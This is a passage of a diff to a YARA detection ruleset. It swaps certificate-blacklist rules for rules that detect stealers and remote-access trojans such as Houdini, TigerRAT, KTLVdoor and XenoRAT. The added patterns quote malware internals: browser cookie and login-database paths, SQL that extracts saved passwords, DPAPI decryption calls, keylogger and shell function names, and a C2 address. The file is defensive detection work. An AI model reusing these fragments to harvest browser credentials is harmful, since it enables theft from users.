+		$cnc2 = "f_dump.php" ascii wide nocase
+		$cnc3 = "c_dump.php" ascii wide nocase
+		$cnc4 = "o_dump.php" ascii wide nocase
+		$db1 = "\\Google\\Chrome\\User Data\\Default\\Cookies" ascii wide nocase
+		$db2 = "\\Mozilla\\Firefox\\Profiles\\*.default" ascii wide nocase
+		$db3 = "\\Opera Software\\Opera Stable\\Cookies" ascii wide nocase
+		$db4 = "$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Default" ascii nocase
+		$db5 = "$($env:APPDATA)\\Mozilla\\Firefox\\Profiles\\*.default" ascii nocase
+		$db6 = "$($env:APPDATA)\\Opera Software\\Opera Stable" ascii nocase
+		$cond1 = "SSID" ascii wide
+		$cond2 = "MSPAuth" ascii wide
+		$cond3 = "\"'T'\"" ascii wide
+		$cond4 = "SNS_AA" ascii wide
+		$cond5 = "X-APPLE-WEBAUTH-TOKEN" ascii wide
+		$sql1 = "SELECT * FROM 'cookies' WHERE host_key LIKE $" ascii wide nocase
+		$sql2 = "SELECT * FROM 'moz_cookies' WHERE host LIKE $" ascii wide nocase
+		$sql3 = "SELECT origin_url, username_value ,password_value FROM 'logins'" ascii nocase
+		$def1 = "Add-Type -AssemblyName System.Security" ascii wide nocase
+		$def2 = "System.Security.SecureString" ascii wide nocase
+		$def3 = "ConvertFrom-SecureString" ascii wide nocase
+		$def4 = "[System.Security.Cryptography.ProtectedData]::Unprotect(" ascii wide nocase
+		$def5 = "[Security.Cryptography.DataProtectionScope]::LocalMachine" ascii wide nocase
+		$def6 = "[Security.Cryptography.DataProtectionScope]::CurrentUser" ascii wide nocase
+		$def7 = "System.Data.SQLite.SQLiteConnection" ascii wide nocase
+		$def8 = "[Environment]::OSVersion.ToString().Replace(\"Microsoft Windows \"," ascii wide nocase
+		$def9 = "Start-Sleep" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Binance" and pe.signatures [ i ] . serial == "f4:4a:91:70:4f:9e:a3:88:44:6d:26:35:f2:a8:c8:a5" )
+		(1 of ( $cnc* ) and any of ( $db* ) and any of ( $cond* ) and any of ( $sql* ) and 7 of ( $def* ) ) or ( all of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_029685Cda1C8233D2409A31206F78F9F : FILE
+rule DITEKSHEN_MALWARE_Win_Houdiniconfig : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "2c1d858b-3adc-5c05-bc72-2a6f12f7245e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4955-L4966"
+		description = "Detects Houdini Trojan configurations"
+		author = "ditekshen"
+		id = "e4f974fe-731e-55a8-aa5f-068a1e62f54d"
+		date = "2020-11-06"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/back-in-2017"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11600-L11616"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a7eec901d92d6126cbc4468d7f2fbccc905f550c7dc8d28b405f583cfde9aea3"
+		logic_hash = "70a67c9a91d2f82184f1d7a5ea51de911a054dd4e38e2cc36f495ed59219afab"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "86574b0ef7fbce15f208bf801866f34c664cf7ce"
-		importance = 20
+
+	strings:
+		$s1 = "install_name="
+		$s2 = "nick_name="
+		$s3 = "install_folder="
+		$s4 = "reg_startup="
+		$s5 = "startup_folder_startup="
+		$s6 = "task_startup="
+		$s7 = "injection="
+		$s8 = "injection_process"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOTO TRADE" and pe.signatures [ i ] . serial == "02:96:85:cd:a1:c8:23:3d:24:09:a3:12:06:f7:8f:9f" )
+		( uint16( 0 ) == 0x5a4d and 5 of them ) or ( all of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Aebe117A13B8Bca21685Df48C74F584D : FILE
+rule DITEKSHEN_MALWARE_Win_Houdini : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "2b9c40e8-9c0e-523d-b746-4e31d0a780e0"
-		date = "2020-11-19"
-		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4968-L4979"
+		description = "Detects the raw binary of the Houdini Trojan Delphi variant"
+		author = "ditekshen"
+		id = "79681ca3-b956-52d4-81b8-b3bd4c86872a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/back-in-2017"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11618-L11689"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cb17c6f311d88125ad0c790c61fe0dd1ffbdefdbea45ffb54c47da5d98f99900"
+		logic_hash = "0580d2525d9d989f98e815dd98b9258724b6e31f058092132c0fbd67cbc5c63c"
 		score = 75
-		quality = 75
+		quality = 46
 		tags = "FILE"
-		thumbprint = "4dc9713dfb079fbae4173d342ebeb4efb9b0a4dc"
-		importance = 20
+
+	strings:
+		$hc = "houdiniclient" ascii wide nocase
+		$mk1 = "keylogger_thread" fullword ascii
+		$mk2 = "keyloger_host" fullword ascii
+		$mk3 = "keylogger_port" fullword ascii
+		$mk4 = "keylogger_thread" fullword ascii
+		$mk5 = "keylogger_init" fullword wide
+		$mk6 = "keylogger_stop" fullword wide
+		$mk7 = "keylogger_offline" fullword wide
+		$mk8 = "silence_keylogger" fullword wide
+		$ms1 = "screenshot_thread" fullword ascii
+		$ms2 = "screen_host" fullword ascii
+		$ms3 = "screen_port" fullword ascii
+		$ms4 = "screenshot_init" fullword wide
+		$ms5 = "screenshot_start" fullword wide
+		$ms6 = "screenshot_stop" fullword wide
+		$ms7 = "screen_thumb" fullword wide
+		$ms8 = "silence_screenshot" fullword wide
+		$mf1 = "file_manager_init" fullword wide
+		$mf2 = "file_manager_root" fullword wide
+		$mf3 = "file_manager_faf" fullword wide
+		$mf4 = "file_manager_download" fullword wide
+		$mf5 = "file_manager_upload" fullword wide
+		$mf6 = "file_manager_stop" fullword wide
+		$mf7 = "file_manager_delete_folder" fullword wide
+		$mf8 = "file_manager_rename_folder" fullword wide
+		$mf9 = "file_manager_rename_file" fullword wide
+		$mf10 = "file_manager_delete_file" fullword wide
+		$mf11 = "file_manager_execute_file" fullword wide
+		$mf12 = "file_manager_thumb" fullword wide
+		$mf13 = "file_manager_upload_http" fullword wide
+		$mf14 = "file_manager_upload_tcp" fullword wide
+		$mf15 = "upload_file_tcp" fullword wide
+		$mf16 = "download_file_tcp" fullword wide
+		$mf17 = "upload_file_http" fullword wide
+		$mf18 = "filemanager_host" fullword ascii
+		$mf19 = "filemanager_port" fullword ascii
+		$mf20 = "filemanager_thread" fullword ascii
+		$mp1 = "password_value" fullword wide
+		$mp2 = "password_init" fullword wide
+		$mp3 = "password_stop" fullword wide
+		$mp4 = "password_firefox" fullword wide
+		$mp5 = "password_chrome" fullword wide
+		$mp6 = "password_all" fullword wide
+		$mp7 = "password_host" fullword ascii
+		$mp8 = "password_port" fullword ascii
+		$mp9 = "password_thread" fullword ascii
+		$mm1 = "misc_init" fullword wide
+		$mm2 = "misc_stop" fullword wide
+		$mm3 = "misc_process_list" fullword wide
+		$mm4 = "misc_module_list" fullword wide
+		$mm5 = "misc_process_terminate" fullword wide
+		$mm6 = "misc_host" fullword ascii
+		$mm7 = "misc_port" fullword ascii
+		$mm8 = "misc_thread" fullword ascii
+		$pl1 = "plugin_file_init" fullword wide
+		$pl2 = "plugin_url_init" fullword wide
+		$pl3 = "plugin_stop" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NANAX d.o.o." and pe.signatures [ i ] . serial == "00:ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_38989Ec61Ecdb7391Ff5647F7D58Ad18 : FILE
+rule DITEKSHEN_MALWARE_Win_Lighthand : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "40c742ec-f683-57fe-bb35-7c44617f9199"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects LightHand"
+		author = "ditekshen"
+		id = "2b644dfb-f09a-50a5-8260-7b7022bce1f4"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4981-L4992"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11691-L11718"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f2108c41c814a815047268d9934a01231936a1cf73cbb92476eb96c9fe4b1091"
+		logic_hash = "4f06467a522b786045839e6b22b888cecc554b0f63cc20dc43dc0f8ec80f5654"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "71e74a735c72d220aa45e9f1b83f0b867f2da166"
-		importance = 20
+
+	strings:
+		$x1 = "27.102." ascii
+		$x2 = "109.248.150.179" fullword ascii
+		$s1 = /Hello (Client|Server)/ fullword ascii
+		$s2 = "%s|%s|%s|%s|%s|%s|" fullword wide
+		$s3 = "%s\\cmd.exe" fullword wide
+		$s4 = "Remote PC" fullword wide
+		$s5 = { 2e 62 61 74 [3-4] 3a 4c 31 0d 0a 64 65 6c
+                20 2f 46 20 22 25 73 22 0d 0a 69 66 20 65 78 69
+                73 74 20 22 25 73 22 20 67 6f 74 6f 20 4c 31 0d
+                0a 64 65 6c 20 2f 46 20 22 25 73 22 0d 0a 00 00
+                6f 70 65 6e }
+		$s6 = { 25 00 2e 00 32 00 66 00 47 00 42 00 00 00 00 00
+                25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00
+                0a 00 00 00 00 00 00 00 5c 00 2a 00 2e 00 2a 00
+                00 00 00 00 0a 00 00 00 2e 00 00 00 2e 00 2e 00
+                00 00 00 00 00 00 00 00 46 00 6f 00 6c 00 64 00
+                65 00 72 00 00 00 00 00 25 00 73 00 5c 00 25 00
+                73 00 00 00 00 00 00 00 25 00 64 00 42 00 00 00
+                25 00 2e 00 31 00 66 00 4b 00 42 00 00 00 00 00
+                25 00 2e 00 31 00 66 00 4d 00 42 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RotA Games ApS" and pe.signatures [ i ] . serial == "38:98:9e:c6:1e:cd:b7:39:1f:f5:64:7f:7d:58:ad:18" )
+		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $s* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D08D83Ff118Df3777E371C5C482Cce7B : FILE
+rule DITEKSHEN_MALWARE_Win_Validalpha : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "d4857ec5-2c99-51f8-a5b8-938c8d83169e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects ValidApha / BlackRAT"
+		author = "ditekshen"
+		id = "3162eb5f-6e2d-598a-b199-22b70ec8a773"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4994-L5005"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11720-L11736"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b6c7f5c57c79d11132535bedce77276f67c4f854f5e8ef2c12aced64f8a188d0"
+		logic_hash = "54d170076d1b32cee6f6252d40548acc7e23b467d692c59d6146a8aadf431211"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8a1bcf92ea961b8bc8817b0630f34607ccb5bff2"
-		importance = 20
+
+	strings:
+		$x1 = "RAT/Black/" ascii
+		$x2 = "RAT/Black/Client_Go/" ascii
+		$s1 = "main.RunTask" fullword ascii
+		$s2 = "main.CmdShell" fullword ascii
+		$s3 = "main.SelfDelete" fullword ascii
+		$s4 = "main.RecvPacket" fullword ascii
+		$s5 = "main.FileDownload" fullword ascii
+		$s6 = "main.CaptureScreen" fullword ascii
+		$s7 = "main.PeekNamedPipe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMO-K Limited Liability Company" and pe.signatures [ i ] . serial == "00:d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_249E3F1B7595E7D0Fe6Df13303287343 : FILE
+rule DITEKSHEN_MALWARE_Win_Tigerrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "3f780428-a482-5201-a7ca-d3608779a5e4"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects TigerRAT"
+		author = "ditekshen"
+		id = "37192fc8-1932-5f33-994a-bb319b131c58"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5007-L5018"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11738-L11756"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4df122a53f2c1a08d1694c8e64b802f58507bb985f1aed8c91e6d7ad24906fca"
+		logic_hash = "38a238339db7e7f573e0c7362af5a08654a9e134f902c0ecae441250a0364c64"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8e99b2786f59e543d1f3d02d140e35342c55c18a"
-		importance = 20
+
+	strings:
+		$m0 = ".?AVCryptorRC4@@" fullword ascii
+		$m1 = ".?AVModuleShell@@" fullword ascii
+		$m2 = ".?AVModuleKeyLogger@@" fullword ascii
+		$m3 = ".?AVModuleSocksTunnel@@" fullword ascii
+		$m4 = ".?AVModuleScreenCapture@@" fullword ascii
+		$m5 = ".?AVModulePortForwarder@@" fullword ascii
+		$s1 = "\\x9891-009942-xnopcopie.dat" fullword wide
+		$s2 = "(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]" fullword ascii
+		$s3 = "[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]" fullword ascii
+		$s4 = "~KPTEMP" fullword wide
+		$s5 = "del \"%s\"%s \"%s\" goto " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "gsLPuSUgRZueWihiZHqYBriNSQqS" and pe.signatures [ i ] . serial == "24:9e:3f:1b:75:95:e7:d0:fe:6d:f1:33:03:28:73:43" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) ) or ( 5 of ( $m* ) ) or ( 3 of ( $m* ) and 2 of ( $s* ) ) or ( 5 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_31D852F5Fca1A5966B5Ed08A14825C54 : FILE
+rule DITEKSHEN_MALWARE_Win_Ktlvdoor : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "8d65caa2-ce28-5f9b-b8a5-3fe903dd5628"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects KTLVdoor"
+		author = "ditekshen"
+		id = "f63ebd05-fb4b-50fb-887b-dacd379594a4"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5020-L5031"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11758-L11791"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e2890f8c623ce15d8a3f996e87be4b73a8cd9f96386ce8d356d7e0fad0342dd3"
+		logic_hash = "3ced9b558c7e17acd015cd2c9dd0c5d024bf9c31c7f2e7c9b7b937124109cf8b"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "a657b8f2efea32e6a1d46894764b7a4f82ad0b56"
-		importance = 20
+
+	strings:
+		$s1 = "/cmd/acc/agent_acc" ascii
+		$s2 = "main.DLLWMain" ascii
+		$s3 = "main.checkSilent" ascii
+		$h1 = ".handleInteractiveShell" ascii
+		$h2 = ".handleNetstat" ascii
+		$h3 = ".handleProcess" ascii
+		$h4 = ".handleRefreshHostInfo" ascii
+		$h5 = ".handleTimestomp" ascii
+		$h6 = ".handleSoInject" ascii
+		$h7 = ".HandleRegInfo" ascii
+		$h8 = ".handlePortscan" ascii
+		$h9 = ".handleReflectDllInject" ascii
+		$h10 = ".handleFileDownload" ascii
+		$f1 = ".RdpWithNTLM." ascii
+		$f2 = ".FingerPrintOs." ascii
+		$f3 = ".ScanWMI." ascii
+		$f4 = ".ScanWinRM." ascii
+		$f5 = ".ScanWeb." ascii
+		$f6 = ".ScanSmb2." ascii
+		$f7 = ".ScanRDP." ascii
+		$f8 = ".ScanPing." ascii
+		$f9 = ".ScanOxid." ascii
+		$f10 = ".ScanMssql." ascii
+		$f11 = ".ScanBanner." ascii
+		$fr1 = /\.proxy[CS]2[CS](TC|UD)P/ ascii
+		$fr2 = /\.Scan(WMI|WinRM|Web|Smb2|RDP|Ping|Oxid|Mssql|Banner)\./ ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BBT KLA d.o.o." and pe.signatures [ i ] . serial == "31:d8:52:f5:fc:a1:a5:96:6b:5e:d0:8a:14:82:5c:54" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and ( ( 6 of ( $h* ) ) or ( 12 of ( $f* ) ) or ( 2 of ( $h* ) and 4 of ( $f* ) ) or ( 1 of ( $s* ) and ( 4 of ( $h* ) or 4 of ( $f* ) ) ) or ( 13 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_510C5E540503F30C9Caa3082296Aa452 : FILE
+rule DITEKSHEN_MALWARE_Win_Fakecaptcha_Downloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "eddbe6f1-fb7c-5129-afb4-6b4d67e39f60"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects downloader executables dropped by fake captcha"
+		author = "ditekshen"
+		id = "d577e8ef-11df-565c-9925-63b8768a7115"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5033-L5045"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11793-L11803"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "cb01f31a322572035cf19f6cda00bcf1d8235dcc692588810405d0fc6e8d239c"
-		logic_hash = "9b6ad8b3e90fcd63f86b353e89ce7e6226197bfcb491e2151b8dbf580466076e"
+		logic_hash = "57c39ce93f74d03767e7fde53281983a8462e4f3705d1bb9084bc169a08a0f83"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3e56a13ceb87243b8b2c5de67da54a3a9e0988d7"
-		importance = 20
+
+	strings:
+		$s1 = "</script>MZ" ascii
+		$s2 = "window.close();" ascii
+		$s3 = "eval(" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Systems Analysis 360 Ltd" and pe.signatures [ i ] . serial == "51:0c:5e:54:05:03:f3:0c:9c:aa:30:82:29:6a:a4:52" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_56Bba7Fe242E6B49695Bcf07870F5F5E : FILE
+rule DITEKSHEN_MALWARE_Win_Xenorat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "902c1949-81e6-5070-ac60-2ebbb363fc6d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects Blacksuit"
+		author = "ditekshen"
+		id = "7f27ebef-8a0e-591a-a926-ac950db86053"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5047-L5058"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11805-L11820"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6c9da28b90bcff069509fc8e91c0a960805bb8339d0fa21f5466c38b6d20f95f"
+		logic_hash = "487046464f545fb9e4a1d6e277cdc010eac6886583f0b388555a483d9021191b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3c176bff246a30460311e8c71f880cad2a845164"
-		importance = 20
+
+	strings:
+		$x1 = "xeno rat client" wide
+		$x2 = "xeno_rat_client." ascii
+		$x3 = "xeno rat client" ascii
+		$s1 = "+<AddToStartupNonAdmin>" ascii
+		$s2 = "+<ConnectAndSetupAsync>" ascii
+		$s3 = "+<SendUpdateInfo>" ascii
+		$s4 = "+<RecvAllAsync_ddos_" ascii
+		$s5 = "Plugin.Chromium+<Get" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ewGMiQgCHj" and pe.signatures [ i ] . serial == "56:bb:a7:fe:24:2e:6b:49:69:5b:cf:07:87:0f:5f:5e" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) ) or ( 2 of ( $x* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Dfef1A8C0Dbfef64Bc6C8A0647D6E873 : FILE
+rule DITEKSHEN_MALWARE_Multi_POOLRAT : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "a8e2a271-399f-531a-8e69-27a1598ba086"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects POOLRAT"
+		author = "ditekshen"
+		id = "5831b479-592d-591b-88b4-73102fe4b6ec"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5060-L5071"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11822-L11839"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "104f066ddfd34edc328844d06a84a1663b0d271c02599825c1797704e582883a"
+		logic_hash = "efc5881975e97583188d43a8a6b0eb59bb7103664897cc0f88ddc4d2376bd842"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0709cdcb27230171877e2a11e6646a9fde28e02c"
-		importance = 20
+		clamav1 = "MALWARE.Osx.Trojan.POOLRAT"
+		clamav2 = "MALWARE.Linux.Trojan.POOLRAT"
+
+	strings:
+		$s1 = "MSG_CmdP" ascii
+		$s2 = "MSG_WriteConfigP" ascii
+		$s3 = "MSG_SecureDelP" ascii
+		$s4 = "ConnectToProxyP" ascii
+		$s5 = "MSG_KeepConP" ascii
+		$s6 = "MSG_SleepP" ascii
+		$s7 = "MSG_TestP" ascii
+		$s8 = "MSG_SetPathP" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NnTqRHlSFNJSUHGaiKWzqyHGdPzBarblmWEzpKHvkZrqn" and pe.signatures [ i ] . serial == "00:df:ef:1a:8c:0d:bf:ef:64:bc:6c:8a:06:47:d6:e8:73" )
+		( uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf or uint16( 0 ) == 0xfeca ) and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0609B5Aad2Dfb81Fbe6B75E4Cfe372A6 : FILE
+rule DITEKSHEN_MALWARE_Multi_Pondrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "db7bf2e3-f514-5133-a35a-87c43a5f12cf"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects PondRAT"
+		author = "ditekshen"
+		id = "cb8cca87-6b5e-5984-8a73-9f800b262d77"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5073-L5084"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11841-L11858"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2f483d06fd7af8db8e79203dcd4252d74f4859c0681e0bfcc4a97b351cb758a9"
+		logic_hash = "affa35f789725d3a8cea8dc95744c4e771690fde5f73936d0806a8c9f72fdb2e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a30013d7a055c98c4bfa097fe85110629ef13e67"
-		importance = 20
+		clamav1 = "MALWARE.Osx.Trojan.PondRAT"
+		clamav2 = "MALWARE.Linux.Trojan.PondRAT"
+
+	strings:
+		$s1 = "MsgDown" ascii
+		$s2 = "MsgUp" ascii
+		$s3 = "MsgRun" ascii
+		$s4 = "MsgCmd" ascii
+		$s5 = "CryptPayload" ascii
+		$s6 = "RecvPayload" ascii
+		$s7 = "csleepi" ascii
+		$s8 = "FConnectProxy" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "vVBhgeghjdigSdWYSAdmy" and pe.signatures [ i ] . serial == "06:09:b5:aa:d2:df:b8:1f:be:6b:75:e4:cf:e3:72:a6" )
+		( uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf or uint16( 0 ) == 0xfeca ) and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_02B6656292310B84022Db5541Bc48Faf : FILE
+rule DITEKSHEN_MALWARE_Win_Cicada3301 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "252c8339-73d3-5de0-8f75-78a6a2da4abc"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects Cicada3301"
+		author = "ditekshen"
+		id = "0aebee9f-177d-5a1b-87e0-8797fb6f6823"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5086-L5097"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11860-L11885"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "374f7abfab6f7def8b895dc9536ca6bb7a605e9478934af6c97e8b7595fbee19"
